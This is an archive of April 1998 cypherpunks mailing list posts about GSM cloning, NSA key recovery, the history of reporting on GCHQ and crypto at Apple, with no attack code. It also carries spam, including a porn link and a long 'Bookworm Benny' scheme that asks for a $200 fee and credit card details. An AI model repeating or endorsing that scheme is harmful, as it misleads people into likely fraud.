To: Sex                                      @aol.com
Subject:  
Message-ID: <199804141833.OAA06029@brampton1.netmatrix.net>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><h1><B>A new FREE porn page everyday! Click ME</B></b></FONT></PRE></HTML>
























*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dianne Evans <diannee@jps.net>
Date: Tue, 14 Apr 1998 15:48:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: GSM cellphones cloned
Message-ID: <3.0.32.19980414153441.00691a18@jps.net>
MIME-Version: 1.0
Content-Type: text/plain


Why don't you guys write up the technical details of your hack and post
them to the list?  Pac Bell, et all can't give you much legal trouble for
practicing your constitutional right to free speech.  
	Congrats and keep up the good work!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trans World Specials" <twaweb@inet2.twa.com>
Date: Tue, 14 Apr 1998 13:32:31 -0700 (PDT)
To: Trans World Airlines Customers <twaweb@inet2.twa.com>
Subject: Trans World Specials Fare Sales
Message-ID: <19980414184054.24767.qmail@inet2.twa.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Trans World Specials for April 14, 1998.
 
 All fares are valid for travel originating 4/18/98 and 
 returning 4/20/98 or  4/21/98.  All tickets  must be
 purchased by 4/17/98.   As always, travel may
 originate in either direction.  
 
 Did you know TWA begins service to Anchorage,
 Alaska next month.  Read all about it at http://www.twa.com
 
 On to this week's Trans World Specials.
 
 Roundtrip coach 
 fare:		To/From:
 
 
 $79		St. Louis, MO (STL) / Wichita, KS (ICT)
 $79		St. Louis, MO (STL) / Minneapolis, MN (MSP)
 
 
 $99		New York , NY (JFK) / Chicago, IL (ORD)  nonstop only
 
 
 $129		St. Louis, MO (STL) / Colorado Springs, CO (COS)
 
 
 Travel is not valid on Trans World Express flights series 7000-7999.   
 
 Call TWA at 1-800-221-2000 and book your Trans World Special today
 
 
 ***********TWA GETAWAY VACATIONS*********************
 
 BEST OF ITALY  FROM  $2,119  INCLUDES:
 
 - roundtrip economy airfare
 - visit Rome, Assisi, Florence, Verona, Padua, Venice
 - 10 day/ 8 night premier escorted vacation
 - buffet breakfast daily
 - First Class hotel and some dinners
 - sightseeing in major cities
 - private luxury motorcoach transportation
 - 5000 bonus FFB miles in addition to actual miles earned
 - available for 6/2,  6/23, and 7/7/98 departures from Tampa, Chicago, 
   Miami, Orlando
 - Indianapolis, Washington DC, and Cleveland
 
 
 SAN JUAN - CROWN PLAZA AND CASINO INCLUDES:
 
 - roundtrip economy airfare
 - hotel located on beautiful Isla Verde Beach
 - 15 minutes from historic Old San Juan
 - 2000 bonus FFB miles in addition to actual miles earned
 - 2 nights accommodations
 - airport transfers 
 - available for $337 from New York
 - for only $392 from Hartford, Boston, Baltimore, Philadelphia, Pittsburgh, 
   and Washington DC
 
 Call 1-800-GETAWAY ( 438-2929) and book your GETAWAY tour today.
 
 
 ****************ALAMO*********************************
 
 Alamo offers these low rates for an economy car valid 4/18/98 - 4/20/98
 
 $17.99		St. Louis,  Minneapolis,  Chicago( O'Hare)
 
 $18.99		Colorado Springs
 
 For reservations call Alamo at 1-800-GO-ALAMO and request rate code RT and
 ID # 443833. 
 
 For online reservations visit Alamo at http://www.goalamo.com
 
 
 ***************HILTON HOTELS AND RESORTS***************
 
 Hilton Hotels/Resorts offers these low rates valid the nights of 
 4/18/98 - 4/20/98.
 
 $69	Arlington Park Hilton, Arlington Heights IL ( located only 15 
         minutes from O'Hare near shopping and racetrack, sports complex 
         and tennis )
 
 $89	Minneapolis/St. Paul Airport Hilton, Bloomington, MN ( located
 	only one mile from Mall of America with free shuttle. )
 
 For reservations call Hilton at 1-800-774-1500 and ask for Hilton Value Rates.
 
 Visit Hilton at online at http://www.hilton.com
 
 *******************TERMS AND CONDITIONS*****************
 
 Airfare Terms and Conditions: 
 GENERAL CONDITIONS: Fares shown are round trip, nonrefundable and are subject 
 to change. Changes to itinerary are not permitted.  Fares do not include 
 Passenger Facility Charges of up to $12 depending on itinerary. Must use 
 E-Ticketing for domestic travel. Credit card is the only form of payment 
 accepted. Offer is not available in conjunction with any other discount, 
 coupon or promotional offer. Seats are limited and may not be available on 
 all flights or days of the week. Tickets must be purchased at time of 
 booking and no later than 4/17/98. Standby passengers not allowed. 
 
 DOMESTIC: Valid for outbound travel on Saturday (4/18) and return Monday 
 (4/20) or Tuesday (4/21). Travel is effective 4/18/98 with all travel to be 
 completed by 4/21/98. Minimum stay is 2 days. Maximum stay is 3 days. 
 
 Getaway Conditions: 
 ALL PACKAGES: Package includes round-trip economy airfare from cities 
 indicated. Price is per person based on double occupancy and is subject to 
 change. Availability, restrictions, surcharges, blackouts and cancellation 
 penalties apply. No other discounts or promotions are valid in conjunction 
 with these packages. 
 
 DOMESTIC CONDITIONS: Depart for San Juan Monday-Tuesday and return 
 Wednesday-Thursday. Travel is valid 5/4/98-6/9/98 with all travel completed 
 6/11/98.  Price does not include Passenger Facility Charges of up to $16 per 
 person. Full payment due by 4/20/98. 
 
 INTERNATIONAL CONDITIONS: Seats are limited and may not be available on all 
 flights.  Price does not include Passenger Facility Charges, US 
 departure/arrival, agriculture, and security fees from point of origin of 
 travel up to approximately $68 per person. Single supplement $339.  Full 
 payment is required by 4/20/98. 
 
 Car Rental Conditions: 
 Taxes (including in California, VLF taxes ranging up to $1.89 per day), 
 registrations fee/tax reimbursement, and airport access fees/taxes, if any, 
 are extra.  Optional CDW, liability insurance, fuel, additional driver fee, 
 drop charges and other optional items are extra. Rates higher for renters 
 under age 25. Rates valid for rentals commencing on Saturday and ending by 
 11:59 PM on Tuesday. Rates only valid during week in which they are published 
 via TWA Internet site.  A 24-hour advance reservation is required.  
 Availability is limited. 
 
 Hotel Conditions: 
 Hilton Hotels and Resorts special rates are available only during the specific 
 week in which they are published via the TWA Hot Deals Internet site and the 
 HiltonNet Internet site. Limited availability; rooms at these Hilton Value 
 Rates are sold on a first-come, first-served basis. Availability, rate, and 
 terms of occupancy are not guaranteed and will be confirmed at time of 
 reservation.  Participating hotels, rates and terms are subject to change 
 without notice.  Single or double occupancy. Early check-in, late check-out 
 subject to availability.  No extra charge for children when they stay in 
 parents' or grandparents' room; total room occupancy subject to local fire 
 safety regulations and other applicable laws or regulations.  Rates vary by 
 season, do not include any other fees or charges, including without 
 limitation state or local taxes or gratuities and are subject to change 
 without notice. Advance booking required. Advance deposit may be required. 
 Offer cannot be combined with any other special discounts, coupons, 
 certificates, special rates, promotional offers, award stays, or 
 meeting/group stays.  Hilton reserves the right to cancel any Hilton Value 
 Rate at any time without notice.  Hilton is not responsible for the terms of 
 other offers in the program, or for any electronic, computer, telephone, 
 security, virus or any other problem or damage related to use of the program 
 or its offers.
 
 
 For reservations call 1-800-221-2000 (domestic) or 
 1-800-892-4141 (international) or call your travel agent and ask for 
 TWA's special Internet fares. 
 
 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 14 Apr 1998 16:36:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA GAK Report Up
Message-ID: <199804142336.TAA04962@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Federal Computer Week has put the NSA critique of key
recovery on its Web site:

   http://www.fcw.com/pubs/fcw/1998/0413/web-nsareport-4-14-1998.html

See a related FCW article today about it at:

   http://www.fcw.com/pubs/fcw/1998/0413/web-nsacdt-4-14-1998.html

The blacked out portions of the diagrams await decoding.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 14 Apr 1998 18:15:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: More on Global SIGINT
Message-ID: <199804150114.VAA22360@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 15 Apr 1998 00:31:58 +0100
To: ukcrypto@maillist.ox.ac.uk
From: Duncan Campbell <duncan@mcmail.com>
Subject: The discovery of global sigint networks : the early years,  part 2

Ramparts in 1972 was indeed the starting point.   Sadly, many subsequent
reporters later confused what "Winslow Peck" [= Perry (not Peter) Fellwock,
which *is* his true name]  wrote about "keyword" interception of
international telephony traffic.  

The story from then on ..

Early in 1976, Winslow came to London.  I interviewed him at length and
then carried out my own research on GCHQ.  I then published an article in
Time Out, June 1976, called the Eavesdroppers which did for GCHQ and the UK
what Winslow did for NSA and the US.    My co-author was another American
journalist, a Time Out staffer called Mark Hosenball.

The Eavesdroppers was the first (and full) description of what GCHQ was and
did.   There had been no previous article, although World In Action had
attempted a programme in 1972.

GCHQ's directors were apoplectic.  The more so because the combined efforts
of the GPO (who tapped my phone from May 76 onwards), the Special Branch
and MI5 (who followed MH and me around) revealed that we had actually got
the article out *without* breaking the Official Secrets Act.   I had done
my research from open technical sources, and (!) telephone directories;
Peck, as an American wasn't covered by the British law.  

But they got even.   Hosenball, an American, was declared a threat to
national security and deported.   Philip Agee, the famous whistleblower
from the CIA, was added in to the deportation list.

Seven months later, I *was* arrested in the furore over their deportations
together with another Time Out reporter, Crispin Aubrey.   We had talked to
a former British sigint operator, John Berry.   The case became known as
"ABC" after our initials.   Over the coming two years, I was accused of
having too much information and faced two counts of espionage as well as
one of breaching section 2 of the Official Secrets Act (a law which was
repealed almost ten years ago now).   These counts totalled a potential
sentence of 30 years imprisonment.   

At Court 1 in the Old Bailey in October 1978, this disgaceful prosecution -
which marked the high water point of MI5's manic campaigns against
"internal subversion" - fell apart.   The story has just recently been told
in the delightful autobiography of Geoff Robertson QC, who was then my no 2
lawyer.  His book is called "The Justice Game".    Maybe its time for me
own autobio ...

Mrs Thatcher put GCHQ firmly on the world map with the union ban, 5 years
later.   And now ...

Philip Agree is married to a ballerina and lives in Germany.
Mark Hosenball is a reporter in Washington.
Perry Fellwock is a lobbyist in Washington.

Crispin Aubrey is an organic farmer in Somerset
John Berry is a social worker in Somerset.	
NSA and GCHQ are still listening. 
And I'm signing off for now.


At 13/04/98, John Young wrote:
>Peter Sommer noted recently that one of the earliest accounts
>of NSA global electronic interception was published in a
>1972 Ramparts magazine article, which we offer for a bit
>of history:
>
>   http://jya.com/nsa-elint.htm  (84K)
>
>James Bamford, Duncan Campbell, Nicky Hager and others
>have confirmed and extended what was at the time viewed as 
>the fanciful antiwar exaggeration of a young former NSA 
>analyst, named Peter Fellwock, first known by the pseudonym 
>Winslow Peck.
>
>Bamford says in The Puzzle Palace that NSA elected to not
>prosecute Fellwock in the hope that no one would believe his
>astonishing claims of NSA ELINT-ing friends and foes alike.
>
>Would anyone know where Peter Fellwock is now? Assuming
>that the marvelous "Fellwock" is not a NSA-pseudo for "Peck."
> 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 14 Apr 1998 19:02:12 -0700 (PDT)
To: dcsb@ai.mit.edu
Subject: Re: Apple crypto engineer position available
In-Reply-To: <v04003a02b159899826a3@[139.167.130.246]>
Message-ID: <v04003a0cb15998c5b764@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain


Please note, this is *not* a flame. I'm not getting even *slightly* warm,
here... :-).


At 6:20 PM -0400 on 4/14/98, Somebody, Waay Up There at Apple, wrote to me,
offline:

> I don't get it.

Yup. The old irony meter is pegged, alright...

:-).

> >At 12:00 PM -0400 on 4/14/98, Mike Barnick wrote:
> >
> >
> >> Apple is looking for a senior engineer to work on providing cryptographic
> >>APIs on the operating system.
> >
> >:-).
> >
> >I see the law of conservation of irony still holds...
> >
> >Cheers,
> >Bob Hettinga


Tell ya what, Somebody, I'll give you three hints:

Hint 1: Whatsisname Sidhu,

who negotiated the world's first RSA license, and who probably could have
invented digital commerce on the internet all by himself if he only knew
what he had, already bought and paid for, wasted in a mail and LAN
protocol, buried in the bowels of the MacOS.

We still haven't seen what's in that RSA license to Apple, but, given RSA's
financial straits at the time the license was issued, I bet it reads more
of a pornographic act than a legal agreement. :-). I for one would be
interested how transferrable it *still* is. Like, if Apple builds a Mac
crypto toolbox, does that mean that anyone writing code using the crypto
toolbox has a license to use the algorithms therein? I bet so, but the
world will never know. The technology, (RSA, anyway) has a countdown clock
on it now, so it's almost moot. Don't even get me started on ECC, which is,
of course, marvellous, but equally squandered.

Anyway, a more clueful Sidhu, (who, to be fair, couldn't have understood
what was coming) could have, with just a little of the right prompting :-),
taken some of the money you guys gave to, say, Steve, for instance :-), and
bought the blind signature patent at firesale prices from DigiCash ($10
million is chump change, even to Apple, even then, :-)) at last year's
greater-fools exchange of ownership at "the world's greatest financial
cryptography company" (my name, not theirs).

Heck, if Apple had bought DigiCash outright, and just *fired* everybody,
and only used the *technology* (kind of dumb to fire David Chaum, but, hey,
it's my limb, and I'm not coming off of it), Apple could have put blind
signatures into that Macintosh crypto tool box, and the world really
*would* think differently. :-).

That's because, someday sooner than most people think, all these
cryptographic functions, particularly the financial crypto functions like
blind signatures, and probably even something like MicroMint, will be
buried deep in every operating system. Apple could have had crypto for the
rest of us, same as it ever was, way ahead of schedule, same as they always
do. But, no, they fired Sidhu, instead. Causing his whole staff, and every
crypto-clueful person at Apple, to quit in disgust. :-).

What's funny is, Apple *still* has this enormous competitive advantage if
they still want it. Because, even though they're goliath, Microsoft can't
do crypto very well right now. They've got this homunculus called the
Justice Department's antitrust division sitting on their sholder, and they
don't want to do anything to upset Dammit Janet. (I immediately have this
ludicrous picture my head of Ms. Reno in wet underware, with Riff Raff
[Carville, right?] leering at her.) Not to mention the Wrath of the Whole
Rest of the Computer Business, voted through their pocketbooks on capital
hill. ;-). Actually, Microsoft's trying to do strong crypto anyway, bless
their hearts, but they're not going to do it for long, given all the flying
monkeys headed in their general direction.

Fortunately, compared to the antitrust division and their minions, the FBI
is a mere gnat's fart, believe it or not.

That's because, to torture dear Mr. Wolfe, "no Buck Rogers, no bucks":
Digital Commerce *is* Financial Cryptography, and all that. So, all it
really takes from Apple to have this huge advantage, crypto-wise, is for it
to have more cajones than grey matter, which, unfortunately, is exactly the
inverse problem at 1 Infinite Loop, the last I looked. Apple being a
founding signatory to the Key Recovery Alliance Program is a marvellous
example of that. Look, it's a complement, okay? You're *smart*, right? You
just have no --, well, anyway, on to the next hint...


Hint 2: Jon Callas,

who was not only CTO for PGP, but, through being both clueful and at the
right place the right time, ended up CTO for all of Network Associates. NA
is now (or will be soon, after the TIS merger's done) the 900-lb
cryptogorilla nobody's supposed to think about, but can't get out of their
minds.

Of course, this is the same Jon Callas who used to work for the
aforementioned Sidhu, and who, for fun one day, thought up a really
*really* spiffy, rock-solid way to extract real live entropy from the
normal operation of any Macintosh. And I don't mean memory conflicts
either. :-)

What? What's entropy? Hmmm... Well, there's this book you can read, it's
called "Applied Cryptography". It's by a former Mac maven named Bruce
Schneier. You might want to look it up there.  Entropy, of course, brings
me to the the final hint,


Hint 3: Vinnie Moscaritolo,

the guy whose name is written all over Apple's new job discription for a
crypto engineer. The guy who now works for Jon over at PGP-now-NA. Vinnie,
who, while he was at Apple Developer Technical Support last year, asked you
guys to set up a crypto engineering department, not to mention a crypto
toolbox, not to mention a crypto API. Who left in disgust shortly after the
aforementioned Sidhu, but not because you fired Sidhu, because, in typical
Vinnie fashion, he practically venerated Sidhu's clueness about commerce,
because Vinnie saw it as an opportunity (Marines are wierd that way). :-).
Who is probably making waay too much money to come back now, and who would
have probably taken a pay *cut*, even at *DTS* salaries, to do the job had
you offered it to him even a year ago.


Ironic, isn't it?



In the final bit of irony, Somebody Else, in Apple Evangelism at the time,
who was not even especially crypto-clueful back then, and who will also
remain nameless :-), once bandied about the idea of an actual crypto
*evangelist* at Apple. Maybe even a digital commerce evangelist, who, of
course, would be one and the same (digital commerce being financial
cryptography and all).

The irony there is that said evangelist, if hired, would end up spending
all his time evangelizing *Apple*, and not the developer community, who of
course, are clueful and don't need evangelizing about such things.  Such
are things at the new Apple, I guess.

Of course, Somebody Else also doesn't work at Apple anymore either. He
works in, you guessed it, another financial cryptography company. I even
yelled at him about his antics at Apple, even though he's not there
anymore, while we were at the Hansa Bank party at Serenity during FC98 on
Anguilla this year. :-).

Now, what I said *then* was a flame, you better believe it, because back
*then*, when Somebody Else was at Apple, it cost me actual money.

This time, with you, Somebody, it's free of charge, and so I'm not nearly
so worked up.


Cheers,
Bob Hettinga

PS. To save you the cost of a white paper, Somebody, or maybe you can just
pay us for it, already :-), go look at "Digital Commerce for the Rest of
Us", a longish rant Vinnie and I wrote almost two years ago. For some
strange reason, it's still pretty current. ;-).

It's at <http://www.shipwright.com/rants/rant_15.html>

Raines Cohen actually moshed it a bit and stuck it into the inaugural issue
of NetProfessional magazine, god rest it's soul, so you might have seen
some of it there as well.




-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Internet mail info <webmaster@imailinfo.com>
Date: Tue, 14 Apr 1998 22:38:06 -0700 (PDT)
Subject: Receipt of submission
Message-ID: <199804150538.WAA19217@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello friend!

	This mail was send automatically to you, because of
your e-mail address was entered to our database.  You can
remove it from our database or alter your profile at URL
http://www.imailinfo.com.
	Since today, you will receive information e-mails.
You selected following topics:

    o Computer related
      New software announcement
      New software updates
      New hardware announcement
      Programming languages
      Computer aided design

    o Games and fun
      New classic PC games
      New games on internet
      New games for play stations
      adult oriented (must be over 18)

    o Other interesting stuff
      Jokes (in english only)
      Sports related messages
      Money making
      Promotion making
      Messages of other type

Copyright 1998 Internet mail info
webmaster@imailinfo.com
http://www.imailinfo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Tue, 14 Apr 1998 15:46:46 -0700 (PDT)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: NYT on GSM Hack
In-Reply-To: <199804141352.JAA25802@mail1.panix.com>
Message-ID: <Pine.BSF.3.96.980415004648.6885B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain


There were rumors that governments had meddled with the A5/1 voice privacy
algorithm design, causing a weakening of A5/1. I am unaware of any proof
for these claims. A5/2 was of course designed to be weaker, a fact that
has been acknowledged by the GSM consortium.

We found undeniable proof that the keygen algorithm used by A5/1, called
A8, has been deliberately weakened by the designers. We found the smoking
gun. And it is smoking red hot.

Any weakening in A5 itself would come in addition to the weakening of A8.

--Lucky



On Tue, 14 Apr 1998, Duncan Frissell wrote:

> >   researchers believe they have
> >   stumbled across evidence that the system was deliberately
> >   weakened to permit Government surveillance.
> 
> I seem to recall that it was officially announced when the current GSM standard was released that it had been weakened at the request of European governments.  
> 
> Is this an example of anti-government advertising and promotion?  Counting on the fact that no one will recall that we already knew this.
> 
> DCF
> 
> 


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Wed, 15 Apr 1998 03:30:53 -0700 (PDT)
Subject: WE ARE WILLING TO PUT OUR MONEY WHERE OUR MOUTH IS!
Message-ID: <199804151030.DAA28469@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain



                 

                THIS PROGRAM HAS CHANGED OUR LIFE!  IT WILL CHANGE
                          YOURS.   WE WILL EVEN HELP!

  DO YOU WANT TO EARN BIG MONEY IN YOUR SPARE TIME?
  IF YOU DO, THEN READ THIS LETTER COMPLETELY!!!

  Dear Money Making Opportunist,

  Enclosed is important information on how you can EARN BIG MONEY at
home  in your spare time.  Please take a few minutes to read this important
information; it could change your life.  This is a Money Making Program
that you can promote to generate HIGH MONTHLY COMMISSION.  The
company has been in  business since 1986 and is registered with the Better
Business Bureau.  Thousands of people are Earning Extra Income right
from their own homes in their spare time promoting this company!

  Joann Publications of West Hempstead, NY. became a distributor for this
 Company back in May of 1996.  She is NOW Earning More Money promoting
this Company that she was able to leave her Full Time Job  (J.O.B.= Just Over

Broke, {(*>*)}smile).

  Hazel Peppergood of Dana Point, CA. makes a Full Time living promoting
BIG  mail order companies.  Hazel also became a Distributor for this Company
back in May of 1996.  Her first Commission check was for $900, Now she is
Earning even larger Commission checks!

  Peggy Austin of Valatie, NY. became a Distributor for this Company in April

of 1997.   Peggy started mailing out Commission Flyers with her dealership
number on them and in her first month she Earned $540.00 in Commission.

  All you have to do is place your ID Code # on the Commission Flyers, stuff
them into envelopes, place address labels and stamps on them and mail.  It's
Easy Work And Its Profitable!

  The reason why this letter was sent to you is to help YOU Earn EXTRA Money
promoting honest mail-order companies and not get ripped off.  You can start
off
by Joining into this Commission program.  Once YOU Join, all you have to do
is
mail out Commission flyers.  In the second half of this letter, is an
application form
and complete information on how this AMAZING Dealership Program works. JOIN
NOW, it could change your life!

  This is a Great Opportunity, you can EARN thousands of dollars promoting
this
program.  What's good about this program is that you can call this company
and
they will answer all your important questions.  They will also mail out 1,000
Commission
Flyers for YOU just for joining.  With this program you don't have to fill
any orders
or place your name on the flyers.  All you do is place your distributor code
number
on them and mail them out.  All orders go to the Company and if your
distributor
number is on the order forms they will send you your
Commission!.......................
.......................The Money Adds Up Fast.

                   THIS LETTER CAN CHANGE YOUR LIFE!  READ ON!

  Hello, I'm  excited about my ALL NEW Money-Making Opportunity Mailing Kit,
that is loaded with money making opportunity flyers. I'm so sure it will work
for
you that I'm to prove it.  I'm putting my money where my mouth is and backing
it
up with a Full Money Back Guarantee!  If for any reason you decide NOT to
participate in this money making venture, just RETURN MY complete Opportunity

Mailing Kit in good condition within 30 days and I will refund your money
with no
questions asked!

  PLUS, if you Order Now, ahead of everyone else I will print and mail out
ONE
THOUSAND commission flyers for YOU to get YOU started.  Included in my
Opportunity Kit, YOU will receive my secret "NINJA" $25-a month method of
promotion which has earned me hundreds of thousands of dollars.  This
information alone is worth $99.   What are you waiting for?



    This Opportunity Mailing Kit, is Available EXCLUSIVELY through BOOKWORM
BENNY INC!  It was designed for YOU to make money by mailing out my
commission
flyers and by using my AMAZING promotional mailing system.; I know that if
you
follow my instructions you will be well rewarded!

    The cost to participate in this money making venture is a One Time
Distributor
fee of ONLY $200.00. If you want to be a WINNER and start making some real
money for a change then this is your chance to do it.

                      YOU DO NO SELLING, NO PHONE CALLING!

    This Opportunity is NOT a Multi-level Marketing program.   It's just a
SIMPLE
way for you to START your own HOME BASED business and EARN extra cash
easily and cheaply!

    This is NOT a joke.  All you do is mail out my commission flyers that you
will
receive in my starter kit. When you receive my Opportunity Starter Mailing
Kit,
enclosed you will find a large batch of my commission flyers with full
instructions
and your own personal code number All you have to do is place your personal
code number on all the flyers and mail them to HOT Prospects.  All orders
come
to me and I will Pay YOU $100.00 commission on every Opportunity Mailing
Kit order that I receive with your code number Plus, I will also PAY YOU 25%
commission on my other commission offers that in with your code number from
your mailing efforts YOU see, YOU have many ways to EARN Money when you
order my ALL NEW Home Based Opportunity Mailing Kit!

                                 WATCH THE MONEY ADD UP FAST!

   YOU could EARN $1,000 per month with just 10 Opportunity Mailing Kit;
Sales.
With ONLY 100 sales, you could EARN a WHOPPING $10,000.........YOU DECIDE!

    When you JOIN into this Mailing program, 1,000 commission sales flyers;
will
be mailed to generate sales on your behalf. Your original One Time Investment
is
ONLY $200.00 for this Money Making Opportunity, therefore it only takes a few

sales to be in PROFIT!

   This Money Making Opportunity is for SERIOUS people only. My offer is
simple,
order this Money Making Opportunity for a One Time Distributor Fee of $200.00

Right Now and all mailing material will be sent to you with full instructions
so,
you can get off to a fast start.  I will also include my Secret "NINJA"
Promotional
System Absolutely Free!

                          $$ MONEY-BACK GUARANTEE! $$

    You can't afford to wait. Order today and 1,000 commission flyers will be
mailed
out on your behalf But you MUST JOIN NOW! To speed up the process you can
call your order in right over the phone at 516-486-1379. My office hours are
from
11AM. To 5PM. Monday-Thursday EST. I will accept your Visa, Mastercard and
AMEX as payment. To Fax in your order simply complete the order form below.
Don't forget to include your credit card information and fax in the completed

application form to my Fax 516-539-9635. When ordering by mail just complete
the application form and return with your payment.

   I really hope you see the Incredible Opportunity in front of you here!
There
are NO catches. I really want you to succeed. If you succeed then I succeed
as well.  If you have any questions whatsoever please call me at 516-486-1379

and I will try and answer all your important questions!

    Thanks to your patronage Bookworm Benny donates $1.00 of every order
received each and every month to the Muscular Dystrophy Association. I am
so proud to be able to donate this money to Jerry's Kids each and every
month on ALL OUR BEHALF to such a worthy cause..............GOD Bless!

PS. I've been in this business and at the same Postal Box since 1986. You
can rely on me to do my part in this Money Making venture.  If you do
yours  then...........WATCH THE MONEY ADD UP FAST!!!

Sincerely,

Bookworm Benny


If You've Read This Far, Very Good & Congratulations! YOU Are Type Of
Person Who is Ready For Success. If You Don't Want To Go Any Further,
Here Is A FREE Report Just For Reading This Entire Message Click Here:>
mailto:worldmall-info@autoresponder.freeyellow.com  The Free Report:
" THE CHALLENGES OF OWNING A HOME-BASED MAIL ORDER BUSINESS ".



                              HANDY ORDER FORM

  BOOKWORM  BENNY  INC.
  P.O. BOX 1007
  NEW HYDE  PARK NY 11040
  PHONE#: (516)-486-1379 ,  FAX#: (516)-539-9635
  DISTRIBUTOR # D-4482

 Yes, sign me up.  Enclosed is my $200.00 One-Time Distributor Fee.  I
 understand that if for any reason I decide NOT to participate in this
money making venture all I have to do is return all the mailing material
that I received in good condition within 30 days after receiving them
for a refund with no questions asked.


SIGNATURE:____________________________________________

Name:__________________________________________________

Address:________________________________________________

City:______________________________State:_________________

Zip:___________________Phone#:___________________________

Email:______________________@_____________________

____ Check  _____  Money Order   ____ Visa   _____ Mastercard  ____ AMEX

  Credit Card # ________________________________________

  Exp. Date:_____________________

                                               DISTRIBUTOR # D-4482


    (c) Bookworm Benny Inc. 1997)








SPECIAL FREE ONLINE BONUSES FOR THOSE RESPONDING IMMEDIATELY.

If you respond immediately to this offer,  the following help and incentives
are
available from  DISTRIBUTOR #D-4482.

[1]
If You Submit Your Bookworm Benny Registration Form And Respond Immediately
To This Offer, You Will Receive A Vacation Certificate(a $285.Value)
Absolutely
FREE With No Obligation Whatsoever.   For More Information about our vacation

certificates check out our VC Site at:
http://www.leisuretyme.com/vacations.htm

 PS. You can also request a Premium Order Form from D-4482 that you can use
to order Vacation Certificates to boost your own mailing responses after you
join the mailing program.  Premium Order Form at:[ you can print a copy]
http://www.freeyellow.com/members2/worldmall/premium-direct.html

********************************************************************
[2]
Reminder:  Bookworm Benny Inc will mail out 1000 assorted commission flyers
on
your behalf to get you started.

********************************************************************
[3]
THE WARRIORS OF INTERNET MARKETING! An Internet Marketing Resource
Site -  http://WarriorSecrets.com/cgi-bin/warriors.cgi?5772MB.  This Site is
going
to blow you away because you've NEVER seen anything like this!  You will have

ONE FULL YEAR (Money-Back Guarantee) to decide and examine this site to see
whether you like the thousands of dollars worth of FREE Marketing
information,
FREE reports and How-to Books, etc. for a low ONE-TIME,  Life-Time Membership

Fee. (Tons Of Benefits are available, e.g.. you can also receive 3 FREE
Autoresponders). I 'm going to let you decide.  TWO THUMBS UP ON THIS ONE!!

 PS.  Please email me at mailto:miguel@batelnet.bs and let me know how you
like
this particular site  (above).

*************************************************************************
[4]
Bulk Email Service That I Use. (Very Inexpensive & So Far  very Effective,
You'll See)!
Also you will be able check out a bulk email software under a $100 from this
Company,
if you want to do your own bulk emailing.

*************************************************************************
[5]
Free/Low cost Classified Sites that we use, also our favorite Free
Classified Site that we use most.  Don't pay anyone for online classified
ads.  http://www.becanada.com/$/?dnKR15  {Classified Sites Submitter
100 Software (new) & Reseller Program! This is It!  You will be able to
submit your free classified AD to 100 sites in 5 to 10 seconds instead
5 to 10 minutes wow!)

*************************************************************************
[6]
The Right to use the materials we'll send you as incentives and for your own
marketing, etc. (excluding where specified).  e.g. You can use the Bookworm
Benny E-Flyer(new word) that was sent to YOU, you'll just change the
Distributor ID # etc. Also refer your customers to our marketing site or you
may create your own from ours.

******************************************************************
[7]
If You Pay Anything For A WebSite Now...You're Paying Too Much!!!

    FREE WebSite - Includes 2 Megs of Disk Space.  Update Anytime.
    FREE WebSite Wizard - The Best WebSite Builder On The Internet Today.
    FREE WebSite Manager - Helps You Manage All Your WebSite Files.
    FREE Graphics Library - Add Awesome Animated Images To Your Website.
    FREE Web Site Counter - Tracks Your WebSite Visitors.
    FREE  Email Order Forms - Simple Copy And Paste Order Forms.
    FREE Email-On-Demand - Autoresponds Your Info Via Email.
    FREE File Uploading - Your Favorite Images And Files.
    FREE Tech Support - Advanced Automated Email Tech Support.
    FREE Search Engine - Copy and Paste onto Your Web Site.
    You can also use the above services in your own marketing ventures.
    You can use our help if needed when using the above service.  You will
    contact us via email.  .  You will contact us via email.  All the above
are
    offered by one Company and they provide technical support as well.

**********************************************************************
[8]
Four FREE resports:
a} HOW TO PUBLISH FREEBIE AD MAGAZINES FOR FUN & PROFIT
b} HOW TO MAKE A QUICK $1000 SELLING DISCOUNT CARD LICENSES
    TO FUND RAISING ORGANIZATIONS.
c} MAKING MONEY GIVING AWAY FREE SOFTWARE
d} MAKING MONEY WITH DISCOUNT CARDS
Feel FREE to use these any way you wish!

*********************************************************************
[9]
Your Free, Private Life-Time E-mail If You Need Another One!

*********************************************************************
TO RECEIVE ALL OF YOUR BENEFITS, PLEASE E-MAIL US AT
mailto:michellev@batelnet.bs  AND FAX A COPY OF YOUR OFFICIAL
WELCOME LETTER FROM BOOKWORM BENNY, INC WITH YOUR
D- CODE WRITTEN AT THE TOP TO FAX# 352-373-3856.    OR YOU
